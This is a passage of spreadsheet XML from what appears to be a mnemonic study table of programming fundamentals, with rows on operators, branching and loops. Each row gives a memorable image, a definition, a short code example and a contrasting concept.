          <t>Associativity resolves equal-precedence ties: left-assoc 10-4-3 = (10-4)-3 = 3; right-assoc 2**3**2 = 2**(3**2) = 512.</t>
        </is>
      </c>
      <c r="F24" t="inlineStr">
        <is>
          <t>10 - 4 - 3 -&gt; 3 (left); 2 ** 3 ** 2 -&gt; 512 (right)</t>
        </is>
      </c>
      <c r="G24" t="inlineStr">
        <is>
          <t>Precedence - precedence ranks different operators; associativity only kicks in between equals.</t>
        </is>
      </c>
      <c r="H24" t="inlineStr">
        <is>
          <t>Dominoes falling left-to-right vs right-to-left</t>
        </is>
      </c>
      <c r="J24" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K24" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" t="n">
        <v>0</v>
      </c>
      <c r="B25" t="inlineStr">
        <is>
          <t>023</t>
        </is>
      </c>
      <c r="C25" t="inlineStr">
        <is>
          <t>Short-circuit evaluation</t>
        </is>
      </c>
      <c r="D25" t="inlineStr">
        <is>
          <t>A circuit breaker that trips at the first False: current never reaches the second bulb, so it stays dark and its side effects never fire at all.</t>
        </is>
      </c>
      <c r="E25" t="inlineStr">
        <is>
          <t>and/or stop evaluating once the outcome is known: False and f() never calls f - enabling guards like x != 0 and 1/x.</t>
        </is>
      </c>
      <c r="F25" t="inlineStr">
        <is>
          <t>x != 0 and 10/x &gt; 1 # division skipped when x == 0</t>
        </is>
      </c>
      <c r="G25" t="inlineStr">
        <is>
          <t>Bitwise &amp; and | - these always evaluate both operands and never short-circuit.</t>
        </is>
      </c>
      <c r="H25" t="inlineStr">
        <is>
          <t>A relay race where the second runner never starts if the first drops the baton</t>
        </is>
      </c>
      <c r="J25" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K25" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" t="n">
        <v>0</v>
      </c>
      <c r="B26" t="inlineStr">
        <is>
          <t>024</t>
        </is>
      </c>
      <c r="C26" t="inlineStr">
        <is>
          <t>Ternary conditional operator</t>
        </is>
      </c>
      <c r="D26" t="inlineStr">
        <is>
          <t>A railroad Y-switch inside a vending machine: pulling the question-mark lever flips the track, and exactly one of the two snack cars rolls out into the tray.</t>
        </is>
      </c>
      <c r="E26" t="inlineStr">
        <is>
          <t>The conditional expression picks one of two values inline: cond ? a : b in C, 'a if cond else b' in Python - an if that returns a value.</t>
        </is>
      </c>
      <c r="F26" t="inlineStr">
        <is>
          <t>label = "even" if n % 2 == 0 else "odd"</t>
        </is>
      </c>
      <c r="G26" t="inlineStr">
        <is>
          <t>if statement - the ternary is an expression yielding a value; if is a statement executing branches.</t>
        </is>
      </c>
      <c r="H26" t="inlineStr">
        <is>
          <t>A fork-shaped drinking straw with a valve</t>
        </is>
      </c>
      <c r="J26" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K26" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" t="n">
        <v>0</v>
      </c>
      <c r="B27" t="inlineStr">
        <is>
          <t>025</t>
        </is>
      </c>
      <c r="C27" t="inlineStr">
        <is>
          <t>Equality vs identity</t>
        </is>
      </c>
      <c r="D27" t="inlineStr">
        <is>
          <t>Identical twins at passport control: they == perfectly - same face, same coat - but the officer takes fingerprints ('is') and finds two different people.</t>
        </is>
      </c>
      <c r="E27">
        <f>= asks 'same value?'; is (Python) asks 'same object?': [1]==[1] is True but [1] is [1] is False; JS === adds strict type+value.</f>
        <v/>
      </c>
      <c r="F27" t="inlineStr">
        <is>
          <t>a = [1]; b = [1] / a == b # True / a is b # False</t>
        </is>
      </c>
      <c r="G27" t="inlineStr">
        <is>
          <t>JS === - strict value+type equality, still not object identity; JS == coerces types before comparing.</t>
        </is>
      </c>
      <c r="H27" t="inlineStr">
        <is>
          <t>Two photocopies vs the same sheet of paper</t>
        </is>
      </c>
      <c r="J27" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K27" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" t="n">
        <v>0</v>
      </c>
      <c r="B28" t="inlineStr">
        <is>
          <t>026</t>
        </is>
      </c>
      <c r="C28" t="inlineStr">
        <is>
          <t>Bitwise operators</t>
        </is>
      </c>
      <c r="D28" t="inlineStr">
        <is>
          <t>A row of eight tiny light switches worked with tweezers; the AND operation slides a cardboard stencil mask over the row so only the cut-out switches stay visible.</t>
        </is>
      </c>
      <c r="E28" t="inlineStr">
        <is>
          <t>Bitwise ops (&amp; | ^ ~ &lt;&lt; &gt;&gt;) act on each bit of an integer: &amp; masks flags, &lt;&lt; n multiplies by 2^n, ^ toggles bits.</t>
        </is>
      </c>
      <c r="F28" t="inlineStr">
        <is>
          <t>5 &amp; 3 -&gt; 1; 1 &lt;&lt; 4 -&gt; 16; flags |= READ</t>
        </is>
      </c>
      <c r="G28" t="inlineStr">
        <is>
          <t>Logical and/or - logical ops take whole truth values and short-circuit; bitwise ops pair up individual bits.</t>
        </is>
      </c>
      <c r="H28" t="inlineStr">
        <is>
          <t>A punch-card and its overlay template</t>
        </is>
      </c>
      <c r="J28" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K28" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" t="n">
        <v>0</v>
      </c>
      <c r="B29" t="inlineStr">
        <is>
          <t>027</t>
        </is>
      </c>
      <c r="C29" t="inlineStr">
        <is>
          <t>Operator overloading</t>
        </is>
      </c>
      <c r="D29" t="inlineStr">
        <is>
          <t>The plus sign as a moonlighting actor: by day it adds numbers, by night it puts on a wig and glues strings together - same symbol, script chosen by the operands' type.</t>
        </is>
      </c>
      <c r="E29" t="inlineStr">
        <is>
          <t>Overloading lets user types define what operators mean (__add__), so + adds ints, concatenates strings, or merges vectors.</t>
        </is>
      </c>
      <c r="F29" t="inlineStr">
        <is>
          <t>class Vec: / def __add__(self, o): return Vec(self.x+o.x, self.y+o.y)</t>
        </is>
      </c>
      <c r="G29" t="inlineStr">
        <is>
          <t>Coercion - coercion changes operand types to fit an operator; overloading changes what the operator does for a type.</t>
        </is>
      </c>
      <c r="H29" t="inlineStr">
        <is>
          <t>A Swiss Army knife blade that morphs per material</t>
        </is>
      </c>
      <c r="J29" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K29" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" t="n">
        <v>0</v>
      </c>
      <c r="B30" t="inlineStr">
        <is>
          <t>028</t>
        </is>
      </c>
      <c r="C30" t="inlineStr">
        <is>
          <t>Increment operators &amp; side effects</t>
        </is>
      </c>
      <c r="D30" t="inlineStr">
        <is>
          <t>Two subway turnstiles: the post-increment gate prints your ticket before it clicks the counter; the pre-increment gate clicks first, then prints. Chain several in one corridor and the tally comes out scrambled.</t>
        </is>
      </c>
      <c r="E30" t="inlineStr">
        <is>
          <t>i++ yields the old value, ++i the new; side-effecting operators buried in larger expressions breed undefined or confusing order.</t>
        </is>
      </c>
      <c r="F30" t="inlineStr">
        <is>
          <t>C: i = 5; j = i++; // j==5, i==6 / j = ++i; // j==7</t>
        </is>
      </c>
      <c r="G30" t="inlineStr">
        <is>
          <t>Python - Python has no ++; ++x parses as double unary plus, a silent no-op.</t>
        </is>
      </c>
      <c r="H30" t="inlineStr">
        <is>
          <t>A deli ticket dispenser that stamps before or after advancing</t>
        </is>
      </c>
      <c r="J30" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K30" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" t="n">
        <v>0</v>
      </c>
      <c r="B31" t="inlineStr">
        <is>
          <t>029</t>
        </is>
      </c>
      <c r="C31" t="inlineStr">
        <is>
          <t>Compound assignment</t>
        </is>
      </c>
      <c r="D31" t="inlineStr">
        <is>
          <t>A snowball that rolls back into its own bin: scoop the bin's snow, pack fresh snow onto it, and drop the bigger ball back in the same bin - one continuous motion.</t>
        </is>
      </c>
      <c r="E31" t="inlineStr">
        <is>
          <t>Compound assignment (x += y) reads, combines, and stores back in one step; on mutables it may mutate in place (list += extends).</t>
        </is>
      </c>
      <c r="F31" t="inlineStr">
        <is>
          <t>x += 1 / lst += [4] # mutates lst in place / tup += (4,) # rebinds</t>
        </is>
      </c>
      <c r="G31" t="inlineStr">
        <is>
          <t>x = x + y - for lists, x += y extends in place; x = x + y builds a new list and rebinds the name.</t>
        </is>
      </c>
      <c r="H31" t="inlineStr">
        <is>
          <t>A bank account compounding interest onto itself</t>
        </is>
      </c>
      <c r="J31" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K31" t="inlineStr">
        <is>
          <t>Operators &amp; expressions</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" t="n">
        <v>0</v>
      </c>
      <c r="B32" t="inlineStr">
        <is>
          <t>030</t>
        </is>
      </c>
      <c r="C32" t="inlineStr">
        <is>
          <t>if statement</t>
        </is>
      </c>
      <c r="D32" t="inlineStr">
        <is>
          <t>A fork in a hiking trail guarded by a troll who asks one yes/no question: answer true and the side gate swings open; answer false and you walk straight past it.</t>
        </is>
      </c>
      <c r="E32" t="inlineStr">
        <is>
          <t>if evaluates a condition and runs its block only when true - the primal branch that lets programs make decisions.</t>
        </is>
      </c>
      <c r="F32" t="inlineStr">
        <is>
          <t>if age &gt;= 18: / print("adult")</t>
        </is>
      </c>
      <c r="G32" t="inlineStr">
        <is>
          <t>Ternary expression - if is a statement that executes code; the ternary is an expression producing a value.</t>
        </is>
      </c>
      <c r="H32" t="inlineStr">
        <is>
          <t>A drawbridge that lowers only for the password</t>
        </is>
      </c>
      <c r="J32" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K32" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" t="n">
        <v>0</v>
      </c>
      <c r="B33" t="inlineStr">
        <is>
          <t>031</t>
        </is>
      </c>
      <c r="C33" t="inlineStr">
        <is>
          <t>else / elif chain</t>
        </is>
      </c>
      <c r="D33" t="inlineStr">
        <is>
          <t>A hallway of nightclub doors, each with a bouncer: the first bouncer who nods pulls you into his room and the rest never see you. The last door, else, has no bouncer at all.</t>
        </is>
      </c>
      <c r="E33" t="inlineStr">
        <is>
          <t>else runs when the if failed; an elif chain tests top-down and executes only the first true branch, skipping the rest.</t>
        </is>
      </c>
      <c r="F33" t="inlineStr">
        <is>
          <t>if x &lt; 0: sign = -1 / elif x == 0: sign = 0 / else: sign = 1</t>
        </is>
      </c>
      <c r="G33" t="inlineStr">
        <is>
          <t>Sequential ifs - separate ifs can all fire; an elif chain fires at most one branch.</t>
        </is>
      </c>
      <c r="H33" t="inlineStr">
        <is>
          <t>A coin sorter where each slot catches what fits first</t>
        </is>
      </c>
      <c r="J33" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K33" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" t="n">
        <v>0</v>
      </c>
      <c r="B34" t="inlineStr">
        <is>
          <t>032</t>
        </is>
      </c>
      <c r="C34" t="inlineStr">
        <is>
          <t>switch &amp; fallthrough</t>
        </is>
      </c>
      <c r="D34" t="inlineStr">
        <is>
          <t>A pinball drops into its numbered hole - but the holes have no floors, so it keeps crashing down through case after case until it lands on a 'break' trampoline.</t>
        </is>
      </c>
      <c r="E34" t="inlineStr">
        <is>
          <t>switch jumps to the case matching a value; in C-family languages execution falls through into the next case unless break stops it.</t>
        </is>
      </c>
      <c r="F34" t="inlineStr">
        <is>
          <t>switch(n){ case 1: puts("one"); /* falls through! */ / case 2: puts("two"); break; }</t>
        </is>
      </c>
      <c r="G34" t="inlineStr">
        <is>
          <t>match - pattern matching destructures and binds; switch compares one scalar against constants.</t>
        </is>
      </c>
      <c r="H34" t="inlineStr">
        <is>
          <t>An elevator with missing floor stops</t>
        </is>
      </c>
      <c r="J34" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K34" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" t="n">
        <v>0</v>
      </c>
      <c r="B35" t="inlineStr">
        <is>
          <t>033</t>
        </is>
      </c>
      <c r="C35" t="inlineStr">
        <is>
          <t>Pattern matching (match/case)</t>
        </is>
      </c>
      <c r="D35" t="inlineStr">
        <is>
          <t>A toddler's shape-sorter box: the parcel drops through the first hole whose silhouette fits, and the hole's teeth strip off labeled pieces (x, y) as it passes through.</t>
        </is>
      </c>
      <c r="E35" t="inlineStr">
        <is>
          <t>match/case tests a value against structural patterns, destructuring it and binding named parts - matching shapes, not just equality.</t>
        </is>
      </c>
      <c r="F35" t="inlineStr">
        <is>
          <t>match p: / case Point(x=0, y=y): print(f"on axis at {y}")</t>
        </is>
      </c>
      <c r="G35" t="inlineStr">
        <is>
          <t>switch - switch checks equality against constants; match matches structure and binds variables.</t>
        </is>
      </c>
      <c r="H35" t="inlineStr">
        <is>
          <t>A cookie-cutter conveyor stamping and sorting dough</t>
        </is>
      </c>
      <c r="J35" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K35" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" t="n">
        <v>0</v>
      </c>
      <c r="B36" t="inlineStr">
        <is>
          <t>034</t>
        </is>
      </c>
      <c r="C36" t="inlineStr">
        <is>
          <t>Guard clause</t>
        </is>
      </c>
      <c r="D36" t="inlineStr">
        <is>
          <t>A castle guard turning away invalid visitors right at the moat's edge, so the great hall stays uncluttered - impostors never get escorted through every room first.</t>
        </is>
      </c>
      <c r="E36" t="inlineStr">
        <is>
          <t>A guard clause handles invalid or edge cases with an early return at the top, keeping the happy path flat and unindented.</t>
        </is>
      </c>
      <c r="F36" t="inlineStr">
        <is>
          <t>def f(user): / if user is None: return None / # happy path, unindented</t>
        </is>
      </c>
      <c r="G36" t="inlineStr">
        <is>
          <t>Nested validation - nesting wraps the happy path inside every check; guards eject failures first.</t>
        </is>
      </c>
      <c r="H36" t="inlineStr">
        <is>
          <t>An airport security line before the terminal</t>
        </is>
      </c>
      <c r="J36" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K36" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" t="n">
        <v>0</v>
      </c>
      <c r="B37" t="inlineStr">
        <is>
          <t>035</t>
        </is>
      </c>
      <c r="C37" t="inlineStr">
        <is>
          <t>Truthiness</t>
        </is>
      </c>
      <c r="D37" t="inlineStr">
        <is>
          <t>A bouncer who weighs values on a butcher's scale instead of checking IDs: empty boxes and zeros are too light and get bounced; anything with stuff inside walks in.</t>
        </is>
      </c>
      <c r="E37" t="inlineStr">
        <is>
          <t>Truthiness lets non-booleans act as conditions: 0, "", [], None are falsy in Python; JS adds NaN but makes [] truthy.</t>
        </is>
      </c>
      <c r="F37" t="inlineStr">
        <is>
          <t>if items: / process(items) # skipped when list is empty</t>
        </is>
      </c>
      <c r="G37" t="inlineStr">
        <is>
          <t>Explicit None check - 'if x:' misfires when 0 or empty is valid data; use 'if x is not None:' for presence.</t>
        </is>
      </c>
      <c r="H37" t="inlineStr">
        <is>
          <t>A metal detector that beeps for any nonzero content</t>
        </is>
      </c>
      <c r="J37" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K37" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" t="n">
        <v>0</v>
      </c>
      <c r="B38" t="inlineStr">
        <is>
          <t>036</t>
        </is>
      </c>
      <c r="C38" t="inlineStr">
        <is>
          <t>De Morgan's laws</t>
        </is>
      </c>
      <c r="D38" t="inlineStr">
        <is>
          <t>Mr. De Morgan throws a NOT-blanket over two kids holding an AND rope: under the blanket the rope morphs into an OR chain and each kid wakes up wearing negated pajamas.</t>
        </is>
      </c>
      <c r="E38" t="inlineStr">
        <is>
          <t>not (A and B) == (not A) or (not B), and dually; pushing not inward flips and/or, simplifying negated conditions.</t>
        </is>
      </c>
      <c r="F38" t="inlineStr">
        <is>
          <t>not (a and b) == (not a or not b) / not (a or b) == (not a and not b)</t>
        </is>
      </c>
      <c r="G38" t="inlineStr">
        <is>
          <t>Distributive law - De Morgan flips the connective while negating; distribution expands and-over-or without negation.</t>
        </is>
      </c>
      <c r="H38" t="inlineStr">
        <is>
          <t>A photo negative swapping AND gates for OR gates</t>
        </is>
      </c>
      <c r="J38" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K38" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" t="n">
        <v>0</v>
      </c>
      <c r="B39" t="inlineStr">
        <is>
          <t>037</t>
        </is>
      </c>
      <c r="C39" t="inlineStr">
        <is>
          <t>Nesting depth</t>
        </is>
      </c>
      <c r="D39" t="inlineStr">
        <is>
          <t>Code shaped like an arrowhead of Russian dolls: to reach the else at the tip you pry open five dolls, and by the third you have forgotten what the first one held.</t>
        </is>
      </c>
      <c r="E39" t="inlineStr">
        <is>
          <t>Deeply nested conditionals (the arrow anti-pattern) hide logic; flatten with guard clauses, early returns, or extracted functions.</t>
        </is>
      </c>
      <c r="F39" t="inlineStr">
        <is>
          <t>if a: / if b: / if c: do() # -&gt; invert: if not a: return ...</t>
        </is>
      </c>
      <c r="G39" t="inlineStr">
        <is>
          <t>Cyclomatic complexity - complexity counts branch paths overall; nesting depth measures indentation layers.</t>
        </is>
      </c>
      <c r="H39" t="inlineStr">
        <is>
          <t>A hedge maze where each turn narrows the corridor</t>
        </is>
      </c>
      <c r="J39" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K39" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" t="n">
        <v>0</v>
      </c>
      <c r="B40" t="inlineStr">
        <is>
          <t>038</t>
        </is>
      </c>
      <c r="C40" t="inlineStr">
        <is>
          <t>Dangling else</t>
        </is>
      </c>
      <c r="D40" t="inlineStr">
        <is>
          <t>An orphaned else dangling off a cliff face grabs the ankle of the nearest if climbing above it - never the far one your rope diagram (indentation) pointed to.</t>
        </is>
      </c>
      <c r="E40" t="inlineStr">
        <is>
          <t>In brace-free if-if-else, the else binds to the nearest unmatched if - not the one your indentation suggests.</t>
        </is>
      </c>
      <c r="F40" t="inlineStr">
        <is>
          <t>C: if(a) if(b) f(); else g(); // else pairs with if(b)</t>
        </is>
      </c>
      <c r="G40" t="inlineStr">
        <is>
          <t>Python - mandatory indentation makes the pairing explicit; the ambiguity lives in brace languages.</t>
        </is>
      </c>
      <c r="H40" t="inlineStr">
        <is>
          <t>A lost puppy following the closest passerby home</t>
        </is>
      </c>
      <c r="J40" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K40" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" t="n">
        <v>0</v>
      </c>
      <c r="B41" t="inlineStr">
        <is>
          <t>039</t>
        </is>
      </c>
      <c r="C41" t="inlineStr">
        <is>
          <t>Dispatch table</t>
        </is>
      </c>
      <c r="D41" t="inlineStr">
        <is>
          <t>A hotel key rack: the clerk reads your room number, grabs the one hook that matches, and hands you the function hanging on it - no questions asked down a hallway of ifs.</t>
        </is>
      </c>
      <c r="E41" t="inlineStr">
        <is>
          <t>A dict mapping values to handler functions replaces long if/elif chains: selection becomes data, and adding a case is adding an entry.</t>
        </is>
      </c>
      <c r="F41" t="inlineStr">
        <is>
          <t>handlers = {'GET': do_get, 'POST': do_post} / handlers[method](request)</t>
        </is>
      </c>
      <c r="G41" t="inlineStr">
        <is>
          <t>vs switch (032): switch is control flow fixed in source; a dispatch table is data you can build and mutate at runtime</t>
        </is>
      </c>
      <c r="H41" t="inlineStr">
        <is>
          <t>a telephone switchboard operator plugging calls</t>
        </is>
      </c>
      <c r="J41" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K41" t="inlineStr">
        <is>
          <t>Control flow: branching</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" t="n">
        <v>0</v>
      </c>
      <c r="B42" t="inlineStr">
        <is>
          <t>040</t>
        </is>
      </c>
      <c r="C42" t="inlineStr">
        <is>
          <t>Loop</t>
        </is>
      </c>
      <c r="D42" t="inlineStr">
        <is>
          <t>A stone waterwheel turning in a stream: every revolution scoops with the same buckets, but the water in them is new on every pass.</t>
        </is>
      </c>
      <c r="E42" t="inlineStr">
        <is>
          <t>A loop repeats a block while a condition holds, running the same statements many times over changing state.</t>
        </is>
      </c>
      <c r="F42" t="inlineStr">
        <is>
          <t>while items: / process(items.pop())</t>
        </is>
      </c>
      <c r="G42" t="inlineStr">
        <is>
          <t>Recursion - recursion repeats via self-calls and a growing call stack; a loop repeats in one frame with mutable state.</t>
        </is>
      </c>
      <c r="H42" t="inlineStr">
        <is>
          <t>A record player needle stuck in a groove</t>
        </is>
      </c>
      <c r="J42" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K42" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" t="n">
        <v>0</v>
      </c>
      <c r="B43" t="inlineStr">
        <is>
          <t>041</t>
        </is>
      </c>
      <c r="C43" t="inlineStr">
        <is>
          <t>while loop</t>
        </is>
      </c>
      <c r="D43" t="inlineStr">
        <is>
          <t>A jump-rope turner who peeks at a stop sign before every single swing: if the sign is already up before the first swing, you never jump at all.</t>
        </is>
      </c>
      <c r="E43" t="inlineStr">
        <is>
          <t>while tests its condition before each iteration and runs zero or more times - 'repeat as long as this stays true'.</t>
        </is>
      </c>
      <c r="F43" t="inlineStr">
        <is>
          <t>while n &gt; 1: / n = n // 2</t>
        </is>
      </c>
      <c r="G43" t="inlineStr">
        <is>
          <t>do-while - do-while tests after the body, guaranteeing one run; while may run zero times.</t>
        </is>
      </c>
      <c r="H43" t="inlineStr">
        <is>
          <t>A toll gate checked before every lap</t>
        </is>
      </c>
      <c r="J43" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K43" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" t="n">
        <v>0</v>
      </c>
      <c r="B44" t="inlineStr">
        <is>
          <t>042</t>
        </is>
      </c>
      <c r="C44" t="inlineStr">
        <is>
          <t>do-while loop</t>
        </is>
      </c>
      <c r="D44" t="inlineStr">
        <is>
          <t>A restaurant where you must taste the soup before you may see the 'again?' menu: even the customer who wants nothing has already swallowed one spoonful.</t>
        </is>
      </c>
      <c r="E44" t="inlineStr">
        <is>
          <t>do-while runs the body first and tests afterward, guaranteeing at least one iteration - the prompt-then-validate shape.</t>
        </is>
      </c>
      <c r="F44" t="inlineStr">
        <is>
          <t>C: do { s = prompt(); } while (!valid(s)); / Python: while True: ... if ok: break</t>
        </is>
      </c>
      <c r="G44" t="inlineStr">
        <is>
          <t>while - while checks first (0+ runs); do-while checks last (1+ runs).</t>
        </is>
      </c>
      <c r="H44" t="inlineStr">
        <is>
          <t>A free sample you must take before deciding to shop</t>
        </is>
      </c>
      <c r="J44" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K44" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" t="n">
        <v>0</v>
      </c>
      <c r="B45" t="inlineStr">
        <is>
          <t>043</t>
        </is>
      </c>
      <c r="C45" t="inlineStr">
        <is>
          <t>Counted for loop</t>
        </is>
      </c>
      <c r="D45" t="inlineStr">
        <is>
          <t>A metronome fitted with an odometer: wound to n ticks, it swings exactly that many times, the counter arm clicking one notch per swing until it locks.</t>
        </is>
      </c>
      <c r="E45" t="inlineStr">
        <is>
          <t>The classic for bundles init, test, and step - for(i=0; i&lt;n; i++) - marching an index across a range a known number of times.</t>
        </is>
      </c>
      <c r="F45" t="inlineStr">
        <is>
          <t>for i in range(10): print(i) # 0..9</t>
        </is>
      </c>
      <c r="G45" t="inlineStr">
        <is>
          <t>for-each - counted for exposes an index you manage; for-each hands you the elements directly.</t>
        </is>
      </c>
      <c r="H45" t="inlineStr">
        <is>
          <t>A wind-up toy soldier taking exactly n steps</t>
        </is>
      </c>
      <c r="J45" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K45" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" t="n">
        <v>0</v>
      </c>
      <c r="B46" t="inlineStr">
        <is>
          <t>044</t>
        </is>
      </c>
      <c r="C46" t="inlineStr">
        <is>
          <t>for-each loop</t>
        </is>
      </c>
      <c r="D46" t="inlineStr">
        <is>
          <t>A sushi conveyor belt: plates glide into your hands one by one in order; you never count seats or reach across the counter - the belt does all the walking.</t>
        </is>
      </c>
      <c r="E46" t="inlineStr">
        <is>
          <t>for-each iterates directly over a collection's elements (for x in xs) with no index bookkeeping, killing off-by-one bugs.</t>
        </is>
      </c>
      <c r="F46" t="inlineStr">
        <is>
          <t>for name in names: greet(name) / for i, x in enumerate(xs): ...</t>
        </is>
      </c>
      <c r="G46" t="inlineStr">
        <is>
          <t>range(len(xs)) - use enumerate(xs) when you need the index too; indexing by hand reintroduces fenceposts.</t>
        </is>
      </c>
      <c r="H46" t="inlineStr">
        <is>
          <t>A gumball machine dispensing one ball per turn</t>
        </is>
      </c>
      <c r="J46" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K46" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" t="n">
        <v>0</v>
      </c>
      <c r="B47" t="inlineStr">
        <is>
          <t>045</t>
        </is>
      </c>
      <c r="C47" t="inlineStr">
        <is>
          <t>break and continue</t>
        </is>
      </c>
      <c r="D47" t="inlineStr">
        <is>
          <t>On a carousel: break is vaulting over the rail and leaving the ride mid-spin; continue is ducking past the remaining horses to be first at the gate for the next lap.</t>
        </is>
      </c>
      <c r="E47" t="inlineStr">
        <is>
          <t>break exits the innermost loop immediately; continue abandons the rest of this iteration and jumps to the next test.</t>
        </is>
      </c>
      <c r="F47" t="inlineStr">
        <is>
          <t>for x in xs: / if bad(x): continue / if x == goal: break</t>
        </is>
      </c>
      <c r="G47" t="inlineStr">
        <is>
          <t>return - return exits the whole function; break only exits one loop level.</t>
        </is>
      </c>
      <c r="H47" t="inlineStr">
        <is>
          <t>An ejector seat vs skipping to the next song</t>
        </is>
      </c>
      <c r="J47" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K47" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" t="n">
        <v>0</v>
      </c>
      <c r="B48" t="inlineStr">
        <is>
          <t>046</t>
        </is>
      </c>
      <c r="C48" t="inlineStr">
        <is>
          <t>Off-by-one error</t>
        </is>
      </c>
      <c r="D48" t="inlineStr">
        <is>
          <t>A builder orders 10 rails for his 10 fence posts and stands baffled at the end, one rail dangling from his hand - posts are boundaries; the gaps are the count.</t>
        </is>
      </c>
      <c r="E48" t="inlineStr">
        <is>
          <t>Fencepost errors run a loop once too many or too few by confusing counts with boundaries: 10 posts hold only 9 rails.</t>
        </is>
      </c>
      <c r="F48" t="inlineStr">
        <is>
          <t>for i in range(len(a) + 1): a[i] # IndexError on last pass</t>
        </is>
      </c>
      <c r="G48" t="inlineStr">
        <is>
          <t>Half-open ranges - the [0, n) convention makes length = end - start and chains cleanly, preventing most fenceposts.</t>
        </is>
      </c>
      <c r="H48" t="inlineStr">
        <is>
          <t>Cutting a ribbon into pieces: cuts vs pieces</t>
        </is>
      </c>
      <c r="J48" t="inlineStr">
        <is>
          <t>Programming fundamentals</t>
        </is>
      </c>
      <c r="K48" t="inlineStr">
        <is>
          <t>Control flow: iteration</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" t="n">
        <v>0</v>
      </c>
      <c r="B49" t="inlineStr">
        <is>
          <t>047</t>
        </is>
      </c>
      <c r="C49" t="inlineStr">
        <is>
          <t>Infinite loop</t>
        </is>
      </c>
      <c r="D49" t="inlineStr">
        <is>
          <t>A hamster wheel with the exit ladder sawn off: nothing inside the wheel ever changes between spins - nobody refills or moves the water bottle (the loop variable) - so the hamster runs forever.</t>
        </is>
      </c>
      <c r="E49" t="inlineStr">
        <is>
          <t>An infinite loop never falsifies its condition - forgotten increment, wrong comparison, or a skipped exact value - and pins the CPU.</t>
        </is>
      </c>
      <c r="F49" t="inlineStr">
        <is>
